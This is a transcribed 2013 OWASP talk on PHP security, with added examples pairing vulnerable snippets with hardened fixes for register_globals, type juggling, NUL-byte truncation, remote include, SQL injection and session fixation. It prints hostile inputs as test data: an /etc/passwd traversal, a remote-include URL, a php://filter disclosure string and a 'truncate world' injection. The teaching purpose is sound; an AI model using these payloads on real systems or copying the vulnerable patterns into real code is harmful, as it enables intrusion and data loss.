PHP and Application Security - OWASP Road Show 2013

Jun. 25, 2013

  1. PHP and Application Security #owasp #php #appsec
     RICARDO MELO (follow this topic: @rjsmelo)

  2. RICARDO MELO (@rjsmelo)
     ● CTO @ DRI
     ● PHP, MySQL, Linux and lots of other OSS
     ● ZCE, RHCE, LPI 3, ITIL, etc.

  3. Outline
     ● PHP Context
     ● Pain points
     ● Resources
     1999 - 2013 DRI. Some rights reserved.

  4. OWASP - Builders, Breakers and Defenders
     ● Builders - https://www.owasp.org/index.php/Builders
     ● Breakers - https://www.owasp.org/index.php/Breakers
     ● Defenders - https://www.owasp.org/index.php/Defenders

  5. What's PHP?
     ● PHP is a programming language.
     ● It was born as "Personal Home Page", but nowadays it is one of the most popular programming languages on/for the internet.
     ● It has moved away from its roots and changed its name to PHP: Hypertext Preprocessor.

  6. PHP Anatomy
     ● The language "core" (the ifs and elses)
     ● The "official" function libraries (extensions)
     ● All the rest:
       – PEAR
       – PECL
       – Composer
       – OSS libraries

  7. What Makes PHP Popular
     ● Low entry barrier
     ● Immediate results
     ● The "instantaneous reward" factor for the programmer
     ● Solves the problems it sets out to solve in a quick and effective way

  8. In fact it has been defined as ...
     ● Rasmus Lerdorf (the creator of PHP): "PHP has never been just a scripting engine with some cool add-ons. PHP has always been the solution to the Web problem with even more bonus add-ons. And as I have said so many times, PHP is not about purity in CS principles or architecture, it is about solving the ugly web problem with an admittedly ugly, but extremely functional and convenient solution. If you are looking for purity you are in the wrong boat. Get out now before you get hit by a wet cat!"

  9. Ease of use?
     ● register_globals
     ● magic_quotes
     ● safe_mode
     ● open_basedir
     (register_globals, magic_quotes and safe_mode were deprecated in PHP 5.3 and removed in PHP 5.4; open_basedir still exists and is a web-server-level restriction, not an application control.)

  10. Myths and Legends of PHP
     ● PHP is insecure
     ● But <insert your language here> is secure
     ● Frameworks will solve all our security problems

  11. Myths and Legends of PHP (2)
     ● PHP is just for building small sites.
     ● If you really want to build an enterprise website/portal/webapp/etc. then you must use <insert your language here>

  12. Information Security
     "Information security means protecting information and information systems from unauthorized access, use, disclosure, disruption, modification, perusal, inspection, recording or destruction" (http://en.wikipedia.org/wiki/Information_security)

  13. "Standard Approach"
     "[...] we need to improve the security of our software [...]"
     ● A list of security flaws
       – OWASP Top 10
       – SANS Top 25
       – Valid for every programming language and generic enough
     ● And a book: "Secure <your programming language>"
     ● Code review & pen test & ...

  14. Example: OWASP Top 10 (2013)
     ● A1 - Injection
     ● A2 - Broken Authentication and Session Management
     ● A3 - Cross Site Scripting (XSS)
     ● A4 - Insecure Direct Object References
     ● A5 - Security Misconfiguration
     ● A6 - Sensitive Data Exposure
     ● A7 - Missing Function Level Access Control
     ● A8 - Cross-Site Request Forgery (CSRF)
     ● A9 - Using Components with Known Vulnerabilities
     ● A10 - Unvalidated Redirects and Forwards

  15. PHP and (in)Security
     ● "With great power comes great responsibility"
     ● The simplicity and flexibility of the language often gets programmers into trouble
     ● "Shared hosting" brought the "everything in the webroot" kind of application to the PHP world.
       – Remember: unless the server configuration says otherwise, every file under the document root is reachable directly from the internet.

  16. register_globals
     ● The classic...
     ● Every parameter passed to the script (GET, POST, COOKIE, SERVER; the order is set by variables_order) ends up as a global variable, so the request can pre-set variables the script never initialised:

     // call: http://server/script.php?authorized=1
     // with register_globals=On, $authorized is already "1" when the script starts
     if ( some_function_to_check($username, $password) ) {
         $authorized = 1;
     }
     if ( ! $authorized ) {   // never initialised: the attacker's value survives
         exit;
     }
     // rest of the code

  17. $_REQUEST
     ● $_REQUEST was a quick fix for register_globals
     ● Uses the same processing order as register_globals (variables_order; request_order since PHP 5.3)
     ● Instead of registering globals, it registers "keys" on the $_REQUEST array
     ● Mixing GET and POST means a state-changing handler written for POST can be triggered by a GET link or image, which fosters CSRF (XSRF) among other things.
     ● Most recommend accessing $_GET and $_POST directly to keep more control.
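The bypass from slide 16 does not need register_globals itself: many old applications emulate it with extract() over a request array. The following is an added example (not from the slides) that reproduces the bypass that way and then shows the hardened form the last two bullets call for: initialise every state variable and read only the superglobal you expect. The request arrays, the credential store and the function names are constructed for the demo.

```php
<?php
// Added example, not from the talk: register_globals emulated with extract(),
// beside a hardened version of the same check.

function check_credentials($username, $password) {
    // Constructed demo store: only alice / "s3cret" is valid.
    return $username === 'alice' && $password === 's3cret';
}

// Legacy style: extract() turns every request key into a local variable,
// so a request carrying "authorized=1" pre-sets the flag the code relies on.
function legacy_is_authorized(array $request) {
    extract($request);                 // $authorized, $username, $password appear
    if (check_credentials($username, $password)) {
        $authorized = 1;
    }
    return !empty($authorized);        // attacker-controlled when never set by us
}

// Hardened: state starts false, credentials come from the POST array only,
// and nothing in the request can name our variables.
function hardened_is_authorized(array $post) {
    $authorized = false;
    $username = isset($post['username']) ? (string) $post['username'] : '';
    $password = isset($post['password']) ? (string) $post['password'] : '';
    if (check_credentials($username, $password)) {
        $authorized = true;
    }
    return $authorized;
}

// Constructed request: ?authorized=1&username=x&password=y merged into $_REQUEST.
$hostile = ['authorized' => '1', 'username' => 'x', 'password' => 'y'];

var_dump(legacy_is_authorized($hostile));    // bypass: wrong password, still authorized
var_dump(hardened_is_authorized($hostile));  // rejected: the flag is ours, not the request's
var_dump(hardened_is_authorized(['username' => 'alice', 'password' => 's3cret']));
```

Reading $_POST explicitly also addresses the CSRF bullet: a GET request (a link, an image tag) cannot populate $_POST, so it cannot drive a handler that only looks there.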

  18. Case Sensitive & Type Insensitive
     ● The first is normally not a problem...
     ● But loose typing brings some unexpected problems: comparing a string with an int converts the string to a number, so a "leading-numeric" string passes a numeric check while keeping its full text wherever it is used as a string

     $country = "1 ; truncate world;";
     if ( $country > 0 ) {   // true: the string is compared as the number 1
         mysql_query("delete from world where country = {$country}");   // injected SQL
     }
     echo (int)$country;    // 1
     echo (string)$country; // 1 ; truncate world;

  19. Type juggling & Type cast
     ● http://www.php.net/manual/en/language.types.type-juggling.php
       – The variable's type depends on context
         ● If you add (+) then it's an int (or a float)
         ● If you use string concatenation (.) then it's a string
     ● But you can force it!
       – (int), (float), (string), (array), (object), (unset)
       – settype()

     $country = "1 ; truncate world;";
     settype($country, 'integer');   // $country is now the int 1
     echo (int)$country;    // 1
     echo (string)$country; // 1

  20. PHP strings and .... C strings
     ● PHP uses a great number of libraries ... written in C.
       – "\0" (the NUL byte) in PHP is one character like any other
       – But in C it marks the end of the string

     $file = $_GET['file']; // "../../etc/passwd\0"
     if (file_exists('/home/wwwrun/'.$file.'.php')) {
         // file_exists() returns true: the C library stops at the NUL byte,
         // so it checks /home/wwwrun/../../etc/passwd, which exists
         include '/home/wwwrun/'.$file.'.php';
         // /etc/passwd is included; the ".php" suffix never reaches the OS
     }

     (Since PHP 5.3.4 the built-in filesystem functions refuse paths that contain a NUL byte; validating the input before building the path remains the real fix.)

  21. Streams
     ● PHP uses streams to access "files".
     ● file://   — Accessing the local filesystem
     ● http://   — Accessing HTTP(S) URLs
     ● ftp://    — Accessing FTP(S) URLs
     ● php://    — Accessing various I/O streams
     ● zlib://   — Compression streams
     ● data://   — Data (RFC 2397)
     ● glob://   — Find pathnames matching a pattern
     ● phar://   — PHP Archive
     ● ssh2://   — Secure Shell 2
     ● rar://    — RAR
     ● ogg://    — Audio streams
     ● expect:// — Process interaction streams

  22. include / require
     ● include / require use streams, meaning you can include / require via "http", "ftp", etc.
     ● Unless you disable it: remote includes need allow_url_fopen=On and, since PHP 5.2, also allow_url_include=On (Off by default). Local wrappers such as php://filter and phar:// are not covered by either setting, so the path itself still has to be validated.

     // $_GET['theme_path'] => http://some-host.xpto/nasty.php?
     include "{$_GET['theme_path']}/header.inc";
     // the trailing "?" turns "/header.inc" into a query string, so the remote script is what runs
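One hardened replacement for the two include patterns on slides 20 and 22, as an added example that is not from the slides: the caller-supplied theme name must be a plain identifier (which rules out "/", "..", NUL bytes and "scheme://" prefixes in one step), the path is built from a fixed prefix and canonicalised with realpath(), and the result must still lie under the theme directory. The directory layout, the header.inc.php file and the test inputs are constructed in a temporary directory so the script runs on its own.

```php
<?php
// Added example, not from the talk: validating a user-chosen include path.

function safe_theme_file($theme, $base_dir) {
    // 1. Allow only [A-Za-z0-9_-]: no "/", "..", "\0" and no "://" wrappers.
    if (!is_string($theme) || !preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $theme)) {
        return null;
    }
    // 2. Build the path from a fixed prefix and canonicalise it.
    $base = realpath($base_dir);
    $path = realpath($base . '/' . $theme . '/header.inc.php');
    // 3. realpath() is false when the file does not exist; also require the
    //    result to stay inside $base (defence in depth against symlinks).
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

// --- constructed fixture: one legitimate theme in a temp directory ---
$base = sys_get_temp_dir() . '/themes_' . getmypid();
mkdir("$base/default", 0700, true);
file_put_contents("$base/default/header.inc.php", "<?php echo \"default header\\n\";\n");

$tests = [
    'default',                                            // legitimate theme
    "../../etc/passwd\0",                                 // slide 20: NUL-byte truncation
    'http://some-host.xpto/nasty.php?',                   // slide 22: remote include
    'php://filter/convert.base64-encode/resource=index',  // local wrapper, source disclosure
    'missing',                                            // valid name, no such theme
];
foreach ($tests as $t) {
    $p = safe_theme_file($t, $base);
    printf("%-52s => %s\n", addcslashes($t, "\0"), $p === null ? 'REJECTED' : 'ok');
    if ($p !== null) {
        include $p;   // only ever a file we resolved ourselves
    }
}

// cleanup of the fixture
unlink("$base/default/header.inc.php");
rmdir("$base/default");
rmdir($base);
```

The allow-list regex does the real work; realpath() and the prefix check are there so that a later refactor that loosens the regex still cannot escape the theme directory.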

  23. The trendy .inc
     ● There was a trend of naming included files .inc
     ● Only surpassed by the "rename" to .orig or .bak when doing live "debugging" directly on the servers
     ● Normally a file ending in ".php" is processed by PHP; one named .inc or .orig is served as a plain text file, so its source (and any credentials in it) is exposed to anyone who requests it.
       – Keep included files outside the document root, or have the web server deny access to them.

  24. SQL Injection and MySQL
     ● Myth:
       – The mysql extension is vulnerable to SQL injection
       – To solve this you must use
         ● mysqli
         ● PDO
     ● Fact:
       – Every extension will run the queries that YOU build
       – So SQL injection is possible with all of them
       – The problem is between the chair and the keyboard
       – What people actually mean is: use prepared statements, which mysqli and PDO offer and the old mysql extension does not (that extension was deprecated in PHP 5.5 and removed in PHP 7).
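The following is an added example, not from the slides, that ties slide 18 to this one: the loose comparison lets the hostile string through, and the fix is to validate the type and then pass the value as a bound parameter rather than as part of the SQL text. It uses an in-memory SQLite database through PDO so it runs without a MySQL server; the "world" table, its rows and the function names are constructed for the demo.

```php
<?php
// Added example, not from the talk: loose comparison plus string-built SQL
// (vulnerable) beside input validation plus a prepared statement (fixed).

function vulnerable_sql($country) {
    // What the slide's mysql_query() call would send: user data becomes SQL.
    return "delete from world where country = {$country}";
}

function validate_id($raw) {
    // Only an optionally signed decimal integer >= 1 passes; a leading-numeric
    // string such as "1 ; truncate world;" yields null.
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

function delete_country(PDO $db, $raw) {
    $id = validate_id($raw);
    if ($id === null) {
        throw new InvalidArgumentException('country must be a positive integer');
    }
    // Prepared statement: the value travels separately from the query text,
    // so it can never change the statement's structure.
    $stmt = $db->prepare('DELETE FROM world WHERE country = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->rowCount();
}

// --- constructed fixture ---
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE world (country INTEGER PRIMARY KEY, name TEXT)');
$db->exec("INSERT INTO world VALUES (1, 'Portugal'), (2, 'Ireland'), (3, 'Brazil')");

$hostile = "1 ; truncate world;";

// Slide 18: the loose comparison is true (numeric comparison on PHP 5/7,
// string comparison against "0" on PHP 8), so the vulnerable branch runs.
var_dump($hostile > 0);
echo vulnerable_sql($hostile), "\n";   // the injected statement, shown but not executed

// This slide: the same input is rejected before it reaches the database.
try {
    delete_country($db, $hostile);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}

// Legitimate input still works and removes exactly one row.
echo 'deleted rows: ', delete_country($db, '2'), "\n";
echo 'remaining: ', $db->query('SELECT COUNT(*) FROM world')->fetchColumn(), "\n";
```

The two controls are independent: the prepared statement alone would already stop the injection, and the integer validation alone would already reject this input. Keeping both means a future query that someone builds by concatenation still gets a clean value.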

  25. Session Magic
     ● session_start()
     ● It just works
     ● Session fixation
       – session.use_only_cookies (default 1 since PHP 5.3)
       – session_regenerate_id() after login or any privilege change
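One way to apply the two controls above together with the cookie flags a practitioner would set beside them, as an added example that is not from the slides: cookie-only session ids, a regenerated id at login, and HttpOnly/Secure cookies. The function names and the demo credential store are constructed; the session.use_strict_mode line is the PHP 5.5.2+ setting that makes the server refuse ids it did not generate, which is the root of the fixation problem. Run from the CLI the script simply shows that the id changes at login.

```php
<?php
// Added example, not from the talk: session hardening around login.

function secure_session_start() {
    // Session id comes only from the cookie, never from ?PHPSESSID= in the URL.
    ini_set('session.use_only_cookies', '1');
    ini_set('session.use_trans_sid', '0');
    // PHP 5.5.2+: refuse ids the server did not generate; a fixation attack
    // relies on the server adopting an attacker-chosen id (older PHP ignores this).
    ini_set('session.use_strict_mode', '1');
    // Cookie not readable by JavaScript and only sent over HTTPS.
    ini_set('session.cookie_httponly', '1');
    ini_set('session.cookie_secure', '1');
    session_start();
}

function verify_login($username, $password) {
    // Constructed demo store; a real one reads the hash from a database.
    $users = ['alice' => password_hash('correct horse', PASSWORD_DEFAULT)];
    return isset($users[$username]) && password_verify($password, $users[$username]);
}

function login_user($username, $password) {
    if (!verify_login($username, $password)) {
        return false;
    }
    // Privilege level changes here, so throw away the pre-auth id and its
    // server-side data (true = delete the old session file). Anyone who
    // planted the old id in the victim's browser now holds a dead id.
    session_regenerate_id(true);
    $_SESSION['user'] = $username;
    $_SESSION['login_at'] = time();
    return true;
}

// --- demo: everything session-related happens before any output ---
secure_session_start();
$before = session_id();
$ok = login_user('alice', 'correct horse');
$after = session_id();

printf("login ok: %s\nid before: %s\nid after:  %s\nid changed: %s\n",
    $ok ? 'yes' : 'no', $before, $after, $before !== $after ? 'yes' : 'no');
```

The same session_regenerate_id(true) call belongs at logout and at any other step where the session's trust level changes (password change, role switch), not only at login.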

  26. Useful Resources
     ● http://www.php.net
     ● https://www.owasp.org/index.php/Top_Ten
     ● https://www.owasp.org/index.php/Cheat_Sheets
     ● https://www.owasp.org/index.php/PHP_Security_Cheat_Sheet (wip)
     ● https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project
     ● https://www.owasp.org/index.php/OWASP_Guide_Project

  27. QA (follow this topic: @rjsmelo)

  28. www.dri-global.com @rjsmelo ricardo.melo@dri-global.com

  29. Thank you